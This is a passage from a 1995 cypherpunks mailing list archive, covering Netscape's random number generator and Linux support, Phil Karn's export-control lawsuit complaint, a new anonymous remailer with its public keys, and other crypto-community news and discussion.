boss saw this on the news. Interesting. ;-) > > (For the over-stressed and/or humor-impaired: I'm not implying >that netscape is giving away t-shirts, just commenting on the accuracy >of the media.) Concidering that they do give out a fair amount of shirts, they might actually be doing this now. (If it was for bugs they would owe me quite a few shirts. ];>) If they offer you a shirt, ask for one of the "Mosaic Communications Corporation" t-shirts. (The one with the old version of Mozilla on the back.) They are evidently considered a status symbol at Netscape corporate. (And, no, you cannot have mine.) | Minister of Forced Caffinization in the DNRC | alano at teleport.com | |"The moral PGP Diffie taught Zimmerman unites all| Disclaimer: | | mankind free in one-key-steganography-privacy!" | Ignore the man | | -- PGP 2.6.2 key available on request -- | behind the keyboard.| | http://www.teleport.com/~alano | | From hroller at c2.org Mon Sep 25 00:11:09 1995 From: hroller at c2.org (Hroller Anonymous Remailer) Date: Mon, 25 Sep 95 00:11:09 PDT Subject: No Subject Message-ID: <199509250706.AAA26206@infinity.c2.org> Message-ID: <199509250712.CAA01003@khijol> -----BEGIN PGP SIGNED MESSAGE----- > In article <199509242006.PAA02258 at khijol>, khijol!erc at uunet.uu.net (Ed Carp [khijol SysAdmin]) writes: > > > > And the sad part is that now that they have announced that they are > > > > dropping their unofficial Linux support, > > > > > > I have no current plans to alter our treatment of Linux. It is not now, > > > nor has it ever been, a supported platform. We do build for it, > > > and some people are happy about that. > > > > Does this mean that a Linux version of Netscape will no longer be > > available, or that it *will* be available but unsupported? > > It will be available as it has been in the past, which means unsupported. > That means that if you have a bug, and you try to call us for help, > we will not provide it. As much as this might put me ad odds with certain parts of the CP community, this seems quite reasonable to me. After all, why should someone provide support for a platform which is not generating revenue? > > > I have not constructed a business case which would cause Netscape > > > to begin support for Linux versions of the Navigator. Right now, I'm > > > not sure that making a point of this would do what you want. > > > > That all depends on what you mean by "support". If you mean "we will no > > longer make Netscape available for the Linux platform", that's not > > support. If you mean "we will no longer respond to bug reports for > > Netscape on this platform" then that's discontinuing support. > > We have never officially responded to bug reports on Linux. We do not > take money for it for just this reason. This does not mean that we will > not fix bugs that are reported via our feedback page. It doesn't mean > we will fix them either... Understood. Thanks for the clarification :) - -- Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com 214/993-3935 voicemail/pager Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi Q. What's the trouble with writing an MS-DOS program to emulate Clinton? A. Figuring out what to do with the other 639K of memory. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMGZWZCS9AwzY9LDxAQEacgQAmiibHw4Wn4JAudLHJ66dQDJhDoUMjzsR Oh4cd7aYHL4PkSgb7INfS+mMQZ6/VYu7VTHVJchNAU5DxO0A7tljrbMnt+QWWjSx 5pEU0t5jRIScLhBdANSf24YfmBpc929gfUOkSldm0OopsAT9kurPY8qg1Yd/aVjs XB7m9h/1BxE= =wO2X -----END PGP SIGNATURE----- From aleph1 at dfw.net Mon Sep 25 00:30:00 1995 From: aleph1 at dfw.net (Aleph One) Date: Mon, 25 Sep 95 00:30:00 PDT Subject: secure file system for Linux? In-Reply-To: <95Sep24.223025pdt."15556(4)"@alpha.xerox.com> Message-ID: Crypto Filesystem works just fine. Aleph One / aleph1 at dfw.net http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 On Sun, 24 Sep 1995 Mike_Spreitzer.PARC at xerox.com wrote: > Date: Sun, 24 Sep 1995 22:29:48 PDT > From: Mike_Spreitzer.PARC at xerox.com > To: cypherpunks at toad.com > Cc: Mike_Spreitzer.PARC at xerox.com > Subject: secure file system for Linux? > > Is there a secure file system (or secure directory branch) for Linux? > From jsw at neon.netscape.com Mon Sep 25 00:32:57 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Mon, 25 Sep 95 00:32:57 PDT Subject: New Netscape RNG In-Reply-To: <199509250649.CAA27099@clark.net> Message-ID: <445lti$hej@tera.mcom.com> In article <199509250649.CAA27099 at clark.net>, rjc at clark.net (Ray Cromwell) writes: > I'm thinking from the standpoint of someone gathering data on someone > or some server to mount a specific attack. a "most common directories > on the macintosh" file for instance could be used to attack the > current directory method. > > Using those sources probably can't hurt, they just seemed > like odd choices, "grasping for straws" so to speak. I'd rather think of it as a "kitchen sink" approach :-). We are looking for bits wherever we can find them. We are not experts in the internals of all of our supported systems, so any suggestions people could provide for more high quality sources on specific systems would be appreciated. > Nevertheless, I would like to commend Netscape for releasing > the source code for public review. You guys are clearly an intelligent > company, in both your current developments, but also the way > you have handled this bad press. I'd like to add that management has been very supportive of this idea. Barksdale was in the cellular industry when their security through obscurity measures failed, so he knew exactly what we were talking about. > p.s. i hope you guys do a good internal review of your code to remove > buffer overflow bugs We have had code reviews. We will be fixing several of this sort of bug in the upcoming patch. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From gnu at toad.com Mon Sep 25 01:35:10 1995 From: gnu at toad.com (John Gilmore) Date: Mon, 25 Sep 95 01:35:10 PDT Subject: Phil Karn's legal case is filed; here's the Complaint. Message-ID: <9509250835.AA05551@toad.com> Full info is at http://www.qualcomm.com/people/pkarn/export/index.html. UNITED STATES DISTRICT COURT FOR THE DISTRICT OF COLUMBIA ____________________________________ ) PHILIP R. KARN, JR. ) 7431 Teasdale Avenue ) San Diego, California 92122 ) ) Plaintiff, ) ) v. ) ) U.S. DEPARTMENT OF STATE ) Case 1:95CV01812 2201 C Street, N.W. ) Washington, D.C. 20520 ) ) and ) ) THOMAS E. MCNAMARA ) Assistant Secretary ) Bureau of Political-Military Affairs ) U.S. Department of State ) Room 7325 ) 2201 C. Street, N.W. ) Washington, D.C. 20520 ) ) Defendants. ) ) ____________________________________ ) COMPLAINT COMES NOW the plaintiff PHILIP R. KARN, JR., by and through his undersigned counsel of record, and for his causes of action against the named Defendants states the following: 1. Plaintiff PHILIP R. KARN, JR. is a resident of San Diego, California. 2. Defendants, U.S. DEPARTMENT OF STATE and THOMAS E. MCNAMARA, Assistant Secretary of the U.S. Department of State of the United States of America, proceeded against in his official capacity, are charged with, inter alia, the administration of the Arms Export Control Act ("The Act"), 22 U.S.C. 2778 et seq., and the International Traffic in Arms Regulations ("The ITAR") 22 C.F.R. Subchapter M. (Subsequent citations to the ITAR are with a section designator only.) 3. This is an action for a declaratory judgment pursuant to 28 U.S.C. 2201, for the purpose of determining a question of actual controversy between the parties as is herein more fully set forth. Jurisdiction and Venue 4. Jurisdiction of this action is based on 28 U.S.C. 1331, in that it is a civil action arising under the laws of the United States, and the First and Fifth Amendments to the Constitution of the United States. 5. Venue is proper in this Court pursuant to 28 U.S.C. 1391, in that this is a civil action against an officer of the United States and the decisions, which are the subject of this action, were made within the District of Columbia. Causes of Action 6. Plaintiff KARN hereby realleges and incorporates by reference, as though fully set forth herein, the allegations of paragraphs 1-5. 7. The ITAR is implemented by the Office of Defense Trade Controls ("the Office"). 8. Under � 120.2 of the ITAR, the Office is responsible for reviewing and determining whether particular products and technologies are defense articles, as defined at � 120.6, technical data, as defined at � 120.10, or defense services, as defined at � 120.9, and, therefore, subject to the prior export licensing requirements of the ITAR. Such articles, services and technical data are described in � 121.1, which is styled the United States Munitions List ("the USML"). Products and technologies, which are neither defense articles nor defense services, as defined in the ITAR, are subject to the export licensing jurisdiction of the Department of Commerce. 9. The ITAR provides a procedure for the determination of whether a particular product or technology is subject to its licensing requirements. See � 120.4. Upon receipt of a written Commodity Jurisdiction Request, a determination is made as to whether an item is included on the USML. A "commodity jurisdiction" procedure entailing consultations among the Departments of State, Commerce, and Defense is used to make the determination. 10. Under � 120.10, information that is in "the public domain" is not subject to the ITAR's export licensing controls. 11. Pursuant to � 120.4, Plaintiff KARN on February 12, 1994 initially submitted a Commodity Jurisdiction Request for Applied Cryptography, a book ("the Book") by Bruce Schneier, which was published in this country. 12. The Book was published by John Wiley & Sons, Inc. It is available from most bookstores that carry computer books and has a list price of $44.95. It has sold approximately 20,000 copies worldwide. 13. The Book contains computer source codes, detailed descriptions and instructions on how to use a wide variety of cryptographic algorithms, and explains how computer programmers designing computer applications, networks and storage systems can use cryptography to maintain the privacy and security of computer data. 14. Cryptography is a mathematical technique used to protect the secrecy of electronic communications between individuals by scrambling, or encrypting, communications so that only particular recipients with a "key" to decrypt the communications may decipher them. Cryptographic software programs that protect the confidentiality of electronic communications are created by using programming instructions, or source code algorithms. These are sophisticated mathematical equations that are expressed in computer source code and converted into computer programs. Cryptography has a variety of commercial uses including confidentiality of electronic mail, computer software, voice, video and other information in digitized form. 15. Part Five of the Book contains a full-text actual source code listing for fourteen cryptographic algorithms in the C programming language, which were developed by various sources at various times using both private and public sources of funding. A two- disk cryptographic source code set ("the Diskette Set"), which includes the same codes printed on pages 456-570 of Part Five of the Book, is offered for sale on its last page. 16. Binary copies of several of the source code algorithms published in Part Five of the Book are also publicly available from anonymous file transfer protocol ("FTP") sites outside the United States. 17. In a letter dated March 2, 1994, the Office concluded that the Book, including the source code in Part Five, was in "the public domain." The Book was accordingly transferred to the export jurisdiction of the Department of Commerce, where it is eligible for export to all destinations under a general license. (A general license is one which is generally available and need not be specifically applied for in advance of any export.) 18. The March 2, 1994 ruling from the Office expressly did not extend to the Diskette Set. 19. On March 9, 1994, Plaintiff KARN submitted a second Commodity Jurisdiction Request ("the Second Filing") for a determination as to whether a Diskette ("the Diskette") containing only the source code information, as set out in Part Five of the Book, was subject to the export licensing requirements of the ITAR. The only difference between the information contained on the Diskette and Part Five of the Book is the medium-used: magnetic pulses on Mylar instead of inked characters on paper. 20. Plaintiff KARN is desirous of exporting the Diskette to fulfill his interest in the dissemination of cryptographic information. 21. The Office responded to the Second Filing on May 11, 1994 and stated that the Diskette is a defense article under Category XIII(b)(1) of the USML and, therefore, subject to the export licensing jurisdiction of the ITAR. 22. On June 7, 1994 Plaintiff KARN appealed the May 11, 1994 determination of the Office to the Deputy Assistant Secretary of State for Export Controls ("the DAS"). 23. On October 7, 1994 the DAS responded to Plaintiff's appeal by affirming the Office's determination and concluding that the Diskette was a defense article because it was cryptographic software, notwithstanding the fact that the information it contains is identical to that in the Part Five of the Book. 24. Pursuant to � 120.4(g), the DAS's determination was appealed to the Assistant Secretary of State for Political-Military Affairs on December 5, 1994. 25. On June 13, 1995 the Assistant Secretary of State for Political-Military Affairs ("the Assistant Secretary") reaffirmed the DAS's determination but failed to address the fact that the information contained in the Diskette is identical to that in Part Five of the Book, which was already found not to be subject to the licensing jurisdiction of ITAR. 26. No additional appeals mechanism is set forth in the ITAR with respect to commodity jurisdiction determinations. 27. Plaintiff has exhausted his administrative remedies, therefore, this matter is "ripe" for judicial review. 28. The application of the ITAR provisions to Plaintiff KARN, which require the application for and issuance of a license prior to any export, has caused him unusual hardship and irreparable injury in that he has been and is currently being denied the free exercise of constitutional rights as more fully stated below. Plaintiff has no adequate remedy at law for these injuries; accordingly, he is entitled to declaratory relief. 29. The actions of Defendants restricting the dissemination of information contained on the Diskette, which is identical to the information contained in Part Five of the Book, are arbitrary and capricious, constitute an abuse of discretion and are otherwise not in accordance with the Administrative Procedure Act ("the APA") at 5 U.S.C. 706(2)(A). 30. As set forth below, the actions of Defendants restricting the dissemination of information contained on the Diskette, which is identical to the information contained in Part Five of the Book, are contrary to Plaintiff's constitutional rights and, therefore, not in accordance with the APA at 5 U.S.C. 706(2)(B). 31. The Office's determination, and its subsequent reaffirmation by the DAS, and the Assistant Secretary subjecting the Diskette to export licensing controls when the information it contains is identical to the published text of Part Five of the Book, which was deemed not subject to such export controls, is irrational, arbitrary, and capricious. These arbitrary and capricious actions violates Plaintiff's Fifth Amendment right to substantive due process. 32. The Office's determination, and its subsequent reaffirmation by the DAS and the Assistant Secretary, to control the export of the Diskette containing information set forth in a published book is a violation of Plaintiff's fundamental First Amendment right to free speech. 33. As applied by Defendants, the ITAR requires Plaintiff to apply for a license to export the Diskette containing information identical to that in Part Five of the Book. Therefore, as applied to Plaintiff in this instance, the prior licensing requirement of the ITAR operates as a prior restraint on Plaintiff's disclosure of ideas and information in violation of his First Amendment rights to free speech. 34. As applied to Plaintiff, � 120.4 dealing with the determination of whether particular products and technologies are defense articles, is unconstitutionally overbroad and vague, as it includes within its scope speech protected by the First Amendment, namely material contained in the Book, thereby chilling the exercise of free speech rights. Prayer for Relief WHEREFORE, Plaintiff KARN prays for judgment against Defendants, U.S. DEPARTMENT OF STATE and MCNAMARA, as follows: A. Declaring that the provisions of the ITAR, as applied to Plaintiff KARN, be declared null and void, of no effect, as unconstitutional under the Fifth and First Amendments. B. Declaring that the determination to subject the Diskette to the export licensing controls of ITAR is unlawful in violation of the APA at 5 U.S.C. 706(2)(A) & (B). C. For attorneys fees incurred herein. D. For costs of the action incurred herein and E. For such other and further relief as the Court deems just and proper. From wilcoxb at nag.cs.colorado.edu Mon Sep 25 02:50:19 1995 From: wilcoxb at nag.cs.colorado.edu (Bryce Wilcox) Date: Mon, 25 Sep 95 02:50:19 PDT Subject: ANNOUNCE: Bryce's Auto-PGP v1.0 available for 10 cyberbucks Message-ID: <199509250950.DAA27187@nag.cs.colorado.edu> -----BEGIN PGP SIGNED MESSAGE----- I'm pleased to announce the release of "Bryce's Auto-PGP" version 1.0. Bryce's Auto-PGP, a.k.a. "BAP", is a Unix script which makes it simple and convenient to use PGP with almost any Unix message- handling application. As far as I know there is no Unix mssage-handling application that cannot be integrated with BAP. BAP has been test by me personally with Elm, Pine, mh and trn, and it has also turned out to be useful with such Unix utilities as finger and vi. I'm distributing BAP from my World Wide Web site: http://www-ugrad.cs.colorado.edu/~wilcoxb/BAP.html As an experiment in cyberspace economics, I am asking for 10 cyberbucks, the currency for the Internet created by DigiCash company in return for BAP. To sign up for the cyberbuck trial and get your free cyberbucks visit: http://www.digicash.com/ecash/ecash-home.html If you have any problems acquiring or using BAP, please e-mail me. Bryce signatures follow To strive, to seek, to find and not to yield. bryce at colorado.edu http://ugrad-www.cs.colorado.edu/~wilcoxb -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Automatic PGP clearsigning under Unix with Bryce's Auto-PGP v1.0 iQCVAwUBMGZ0jfWZSllhfG25AQHfHwP/YDqzy7B8YfnQ32Oe5kqLfyXvKWUf/cok RObG3lt1pKz3NsuCFwZoJC1T4cmamMkEsEy9S2lcAT4GO4GlAMNm/Su4AdveuvYh /UjHVf2a1wGLcdvq4bfVUV+ldrn2UJuKJno3X9kBP1ofvqANWusOpQvMsPLzQMQj 3K9Uy/ulDEA= =bGwi -----END PGP SIGNATURE----- From frissell at panix.com Mon Sep 25 03:33:48 1995 From: frissell at panix.com (Duncan Frissell) Date: Mon, 25 Sep 95 03:33:48 PDT Subject: Net Gambling on CNN Message-ID: On Sunday's Point-Counterpoint on CNN, Sen. Richard Lugar who is pushing a Federal commission on gambling mentioned gambling on the Internet half a dozen times. His motive seemed to be to give the Feds an excuse for getting involved in gambling control. He also mentioned Federal regulation of Indian reservations in this context. What he wants to do is discourage state promotion of gambling. Net Gambling is really on the table. DCF From rfb at lehman.com Mon Sep 25 09:56:22 1995 From: rfb at lehman.com (Rick Busdiecker) Date: Mon, 25 Sep 95 09:56:22 PDT Subject: Decompiling Netscape In-Reply-To: <199509221732.NAA17523@clark.net> Message-ID: <9509251604.AA28123@cfdevx1.lehman.com> From: Ray Cromwell Date: Fri, 22 Sep 1995 13:32:57 -0400 (EDT) Anyone want to lend me a hand in finding and disassembling the routine responsible for the buffer overflow in Netscape? Or atleast tell me how you did it. (I hope it wasn't done by single stepping thru functions in GDB) I missed the whole Netscape RNG decompilation thread. You could win a T-shirt for your help! Under Unix, you can use objdump, e. g. % objdump -d netscape netscape: file format a.out-sunos-big No symbols in "netscape". Disassembly of section .text: 00002020 clr %fp 00002024 ld [ %sp + 0x40 ], %o0 00002028 add 0x44, %sp, %o1 0000202c sll %o0, 2, %o2 00002030 add 4, %o2, %o2 00002034 add %o1, %o2, %o2 . . . This should work wherever other GNU utilities work. objdump is part of GNU binutils. -- Rick Busdiecker Please do not send electronic junk mail! net: rfb at lehman.com or rfb at cmu.edu PGP Public Key: 0xDBD9994D www: http://www.cs.cmu.edu/afs/cs.cmu.edu/user/rfb/http/home.html send mail, subject "send index" for mailbot info, "send pgp key" gets my key From attila at primenet.com Mon Sep 25 09:56:45 1995 From: attila at primenet.com (attila) Date: Mon, 25 Sep 95 09:56:45 PDT Subject: "Gnusaic"? Why not a Gnu-Style Web Browser? In-Reply-To: Message-ID: "free" access to source code and "free" source code w/ free binaries are too often confused. in and of itself, GNU or Stahlman are not providing free software for whatever use. GNU allows free distribution, but not free commercialization --a good idea except critical maintenance is at the time-available consideration of the author. Sun permits access (well, relatively free) access to their source code for the Java Series and is actively promoting open porting. personally, I like Java/Hot Java. as to a GNU-like product, I concur with TCM -it needs to be done before the commerical interests, politicians, NSA, and assorted crooks control the means whereby we communicate, and the browser, IMHO, has improved our communication and access to information by many orders of magnitude. Now, if any of the non-Gates browsers could fully support multi-use/multi-view mail, news, and info browse at the same time.... I have the code for Mosaic, Java, etc. --they are not trivial. and don't forget VGML. ===================== ORIGINAL MESSAGE ============================= On Thu, 21 Sep 1995, Timothy C. May wrote: > > I'm pretty happy with Netscape 1.1N, but John Gilmore's point about NCSA > Mosaic gives me a thought: > > [snip] > > Why not a Gnu-style Web browser? I don't know if the original Mosaic can be > used and added to, but I can imagine something like this could be done. > > Web browsers are becoming, for many of us, our de facto interfaces to the > Net, not just the Web. A project to make a truly freely distributable Web > browser and Web server (the other part of the puzzle) could be interesting. > Strong crypto could be added by volunteers working in their specialties, > and the "Web proxie" could be put in with robustness (D-H forward secrecy, > for example). > amen! > > I'll stop now, as I've never been a Gnu customer (except for Emacs), and so > I'm not really in a position to comment and speculate on Gnu. > > For all I know, Stallman and others have already thought of this and are > working on it. > > --Tim May > From blane at eskimo.com Mon Sep 25 10:01:15 1995 From: blane at eskimo.com (Brian C. Lane) Date: Mon, 25 Sep 95 10:01:15 PDT Subject: Crypto in Wired Message-ID: <199509251504.IAA12863@mail.eskimo.com> On Sun, 24 Sep 1995 20:00:02 -0400 you wrote: >Good issue of Wired this month (10/95) > I also noticed that on page 35 Chrysler has awarded Philip Zimmerman a 1995 Chrysler Award of Innovation in Design. Its nice to see large corporations taking notice cryptography. Brian --------------------------------------------------------------------------- blane at eskimo.com | Finger for PGP key http://www.eskimo.com/~blane | Privacy, Security, and Electronics ftp://ftp.eskimo.com/~blane | Misc. Interesting files From wmono at Direct.CA Mon Sep 25 10:02:11 1995 From: wmono at Direct.CA (William Ono) Date: Mon, 25 Sep 95 10:02:11 PDT Subject: New remailer now active. Message-ID: <199509251503.IAA08771@fun.direct.ca> -----BEGIN PGP SIGNED MESSAGE----- I have an anonymous remailer running at wmono at spook.alias.net - the domain may or may not change (anybody have any suggestions?). It runs Mixmaster 2.0.1 and Ghio2 to give both Type I and Type II support. In the near future, when I have some time on my hands, I will upgrade to Mix2.0.2. This remailer is going public as of now. I have sent this message to cypherpunks, remailer-operators, and rops, so my appologies in advance if you receive multiple copies. Please add it to your pingers and cover-traffic generators. Although I have tested this remailer a lot, I have only done so from two accounts, therefore I am not certain of its reliability. Hopefully any such problems will be ironed out over the next few days. For this reason, I would advise against using it for sensitive materials for a week or so. If you encounter any difficulties, please contact me at the remailer's address. Mail sent regarding the remailer to wmono at direct.ca (my main addreess) will be ignored and/or deleted. Type I remailer's default latency is set to 900 seconds (15 minutes) so add a Latent-Time: +0:00 header if you want an immediate response. The keys are below. From: wmono at spook.alias.net (Anonymous Remailer) Subject: Remailer keys (as requested) Type I (ghio2) remailer key: - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQBtAzBeRcEAAAEDAMBA+IsCBBGwlCOpfsb0mqL6EiJGu/vnTjTcUPkz9yd8roz7 ym9qLpE9CVL0ND7kh8ctjmPfuvagt8VWhsvfo0cjpBY4J/1CtJelgTXCROyFsJGi 88V/fihQeq3u6De5iQAFEbQqQW5vbnltb3VzIFJlbWFpbGVyIDx3bW9ub0BzcG9v ay5hbGlhcy5uZXQ+iQCVAwUQMF5GJjncl2jz9xa9AQGXHAP7BaO5SDFkSGnhB0vZ UzPfC60WUhgq5mPHzmOYfrjiPPDz+MGmLs95zgAgkwNekYSBo9CQ9V9GIC+ZKV/R CWyfkJEQsY7q4kku6BPYnkXhKuelt/vdLmyguEVbwsUrrLwFKNAGg2RiCZUrk/ej 6l7vIQpPuIZ2uKrteM8Opk3WK9SJAHUDBRAwXkclUHqt7ug3uYkBAXLpAv9BbjrL RQe1m97hdE1J+nKWh+hUPILQa2U57LoFG18KRYsQcnrRjeYcIDN6Skc7AOOK21Ie j44dn6T+9hXCokys7V09xRWpNamKbb6CpsVzM/T5OolXVq7LrkB5gV7VlJE= =a8ZW - -----END PGP PUBLIC KEY BLOCK----- Type II (Mixmaster 2.0.1) remailer key: =-=-=-=-=-=-=-=-=-=-=-= wmono wmono at spook.alias.net f68e6add16880b60eb48a4a4330e2e36 2.0.1 - -----Begin Mix Key----- f68e6add16880b60eb48a4a4330e2e36 258 AASe+l+eIE1GYugbIPDG87h9wIFD0KqLWrMiN0PN RBCmRwsHOu1mZDnJTPlg7RXI17+DJMkk+huGPTuA T+KilAv8WFKWmvHuOpIBwxVBMXFKHsrQYHES63t0 UMQvRCv9LXZZvmiBWKrZp5vQaSOZKYLf4v3pQw7U SsbB5geSP9fQ2wAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAQAB - -----End Mix Key----- - -- ** NOTE NEW KEY ** As of 08/28/95! Old key 0x2902B621 COMPROMISED! William Ono PGP Key: F3F716BD fingerprint = A8 0D B9 0F 40 A7 D6 64 B3 00 04 74 FD A7 12 C9 = fingerprint PGP-encrypted mail welcome! "640k ought to be enough for everybody." -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMGbDUjncl2jz9xa9AQH4RAP+PKHtLC4m3yNH2jZB2VK/Omod+lAqTfVZ fQkmB6zTCi4y0++8zOLyhyzOZJaG3mwDe++DsW5qf3N7KSfcGlwdwChukyAvnzUC 9YxGODMj0x0a8cj/6XvClMsFtB99clzSfhy8IcTdSQDJOv5PoeHo1GkTuXvgjIyY 2YCDG/pdQpg= =L3cw -----END PGP SIGNATURE----- -- ** NOTE NEW KEY ** As of 08/28/95! Old key 0x2902B621 COMPROMISED! William Ono PGP Key: F3F716BD fingerprint = A8 0D B9 0F 40 A7 D6 64 B3 00 04 74 FD A7 12 C9 = fingerprint PGP-encrypted mail welcome! "640k ought to be enough for everybody." From m5 at dev.tivoli.com Mon Sep 25 10:03:35 1995 From: m5 at dev.tivoli.com (Mike McNally) Date: Mon, 25 Sep 95 10:03:35 PDT Subject: `Random' seed. In-Reply-To: <9509251229.AA23816@alpha> Message-ID: <9509251324.AA23974@alpha> Rick Busdiecker writes: > I don't think that anyone has suggested otherwise. I believe that > `clock skew' was the underlying source of randomness that Matt Blaze > mentioned in the message where I first saw that code. Yes, looking at Matt's code I think I believe it. > I have no idea how reasonable it would be to use this approach in > Netscape, however if it were available as an option to generate, say > 300 bits, I'd personally be plenty willing to let it chew up five > minutes while I get my morning caffeine. If you look at it that way (the software just generates new bits every once-in-a-while, like daily) I guess I wouldn't mind. I mean, heck, it's not like there aren't 3 dozen other random daemons that pop up and eat my CPU every now and then :-) It'd only really be a problem if it were used as an "operational" source of random bits. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | Nobody's going to listen to you if you just | Mike McNally (m5 at tivoli.com) | | stand there and flap your arms like a fish. | Tivoli Systems, Austin TX | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From dlv at bwalk.dm.com Mon Sep 25 10:04:05 1995 From: dlv at bwalk.dm.com (Dr. Dimitri Vulis) Date: Mon, 25 Sep 95 10:04:05 PDT Subject: Patents and trade secrets was: Encryption algorithms used in In-Reply-To: <9509250357.AA21926@cs.umass.edu> Message-ID: <0THZBD10w165w@bwalk.dm.com> Some unknown person writes: >> It just moves the prior art date from the date of invention to the date >> of filing the patent application. >What happens if the chronology goes like this ? > >(0) Alice invents a snaffleblort. >(1) Bob invents a snaffleblort. >(2) Bob files for a patent on a snaffleblort. > >From what you said, it would appear that Alice's prior art won't count when >it comes to considering the validity of Bob's patent claim. Is that correct? The bizarre history of the invention of radio comes to my mind. Perhaps we can learn something from it. The Russian Alexander Popov taught for 18 years at a naval school in Kronstadt (near St Petersburg, Russia). He was fascinated by Hertz's 1888 paper on electromagnetic waves and worked with his students on improving his results. In 1889 Russian Navy granted him funds to investigate the use of electromagnetic waves for telecommunications. It's undisputed that Popov invented the antenna in 1894, and built a (subsequently widely used) apparatus for advance warning of thunderstroms in 1995. Now the disputed part: Popov published his paper _Pribor dlja obnaruzhenija i registrirovanija elektrichiskikh kolebanij_ in the January 1896 issue of _Zhurnal Russkogo Fiziko-Khimicheskogo Obshchestva_. In it he described the first radio receiver. On May 7, 1895 and March 12, 1896 Popv made public presentations to the Russian Physico-Chemical Society demonstrating his invention and (in March 1896) transmitted the words "Heinrich Hertz" (in a Morse-like code) at a distance of 250 meters. In June 1896 Gulielmo Marconi filed for a patent in England. He offered to the British government his inventions for wireless transmission of signals, whose details he kept secret. The news of his application and the description of his invention weren't made public until June 1897, when the patent was granted, at which point Popov raised hell and wrote letters to numerous newspapers, claiming that Marconi's patent application was substantially identical to Popov's publications. Meanwhile, Popov continued working on his transmitters/ detectors; by the spring of 1897 he was transmitting at 640m. He got more funds and built 5km equipment by the summer of 1897. In 1900 he installed a production radio-telegraph system between several islands in the Gulf of Finland 50 km apart. After the Marconi incident, Russians viewed radio transmissions technology as a military secret and didn't publish these results until many years later, although comparable technology was available commercially in the West. Popov was always low on funds. Marconi, a brilliant entrepreneur, sold stock in his corporation, raised capital, hired other prominent scientists to work with him, and was developing new technologies much faster. In 1901 Marconi was transmitting radio signals across the Atlantic Ocean, and Popov retired from the naval school and went to teach at the SPB electro- technical institute; he was soon elected its president. In 1904, before the beginning of Russo-Japanese war, the Russians had to buy in great hurry a large quantity of radio receivers/transmitters - made commercially in Germany under Marconi's patent. Popov, no longer with the Navy, got to supervise their installation in Russian naval ships. (Russia lost that war pretty miserably, by the way.) What, you might ask, is the cryptographic relevance of all this? Well, in 1914 Russia was waging war against Germany. Russian military officers in East Prussia relied on radio to transmit information. Russians knew about crypto, but the key distribution was so screwed up that most on their transmissions were in cleartext. (Besides, radio was supposed to be a Russian invention not available to the uncultered foreigners.) Germans reportedly found the intercepted radio transmissions most helpful. Germans also broke the weak code used by the Russians in east prussia within weeks. Their complete knowledge of Russian weaknesses and troop movements led to Russian defeat in East Prussia, after initial advances. (The last claim is from the book _Tajnopis' v istorii Rossii_ (Cryptography in Russian history) by T.A.Soboleva; someone ought to publish its translation.) Soboleva also mentions that East Prussia had an advanced phone system which the Russians didn't disable. On several occasions German civilian from remote farms called Germany from across the front lines and reported on what the Russians were up to. --- Dr. Dimitri Vulis Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From bal at martigny.ai.mit.edu Mon Sep 25 10:05:14 1995 From: bal at martigny.ai.mit.edu (Brian A. LaMacchia) Date: Mon, 25 Sep 95 10:05:14 PDT Subject: RSA/Cylink arbitration agreement on-line Message-ID: <199509251414.HAA29497@cygnus.com> [I haven't seen this mentioned yet on the list...] Cylink has been kind enough to put a copy of the arbitration panel's decision on their web page. Cylink's home page is www.cylink.com. The URL for the actual agreement is: http://www.cylink.com/arbtrn_1.html Spin doctors aside, it doesn't look like either company gained much over the other. I'm not an attorney, but the way I read the agreement RSAREF can continue to be used without violating the Stanford patents. RSA DSI cannot *sublicense* the Stanford patents to third parties, but can *sell code* that practices the methods claimed in the Stanford patents. That code can then be incorporated into other products, which is exactly what PGP 2.6.2 does (it's linked against a copy of the RSAREF library, which is covered by the RSAREF license agreement). --bal From adam at lighthouse.homeport.org Mon Sep 25 10:05:33 1995 From: adam at lighthouse.homeport.org (Adam Shostack) Date: Mon, 25 Sep 95 10:05:33 PDT Subject: Netscape "random" number seed generator code available In-Reply-To: <445j6k$h03@tera.mcom.com> Message-ID: <199509251359.JAA21321@homeport.org> Jeff Weinstein wrote: | | More on the RNG stuff. On Unix systems we look for ~/.pgp/randseed.bin, | and feed it through the RNG hash. On Unix and PC systems we feed the | environment through the hash, so that would be a good place for a | concerned user to put some random stuff of their own. On a SunOS (or any BSD) box ps -e will get you environment variables. ps -eaxuw USER PID %CPU %MEM SZ RSS TT STAT START TIME COMMAND root 53 0.0 0.0 68 0 ? IW Sep 19 0:02 portmap HOME=/ PATH=/bin:/usr/bin:/usr/etc:/usr/ucb root 68 0.0 0.0 16 0 ? I Sep 19 0:00 (biod) root 58 0.0 0.0 40 0 ? IW Sep 19 0:00 keyserv HOME=/ PATH=/bin:/usr/bin:/usr/etc:/usr/ucb Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From khijol!erc at cygnus.com Mon Sep 25 10:05:57 1995 From: khijol!erc at cygnus.com (Ed Carp [khijol SysAdmin]) Date: Mon, 25 Sep 95 10:05:57 PDT Subject: Netscape flaw hits the big time Message-ID: <199509251404.JAA08561@khijol> -----BEGIN PGP SIGNED MESSAGE----- Just heard on the CBS hourly radio news that Netscape will release a new version on Wednesday correcting a flaw 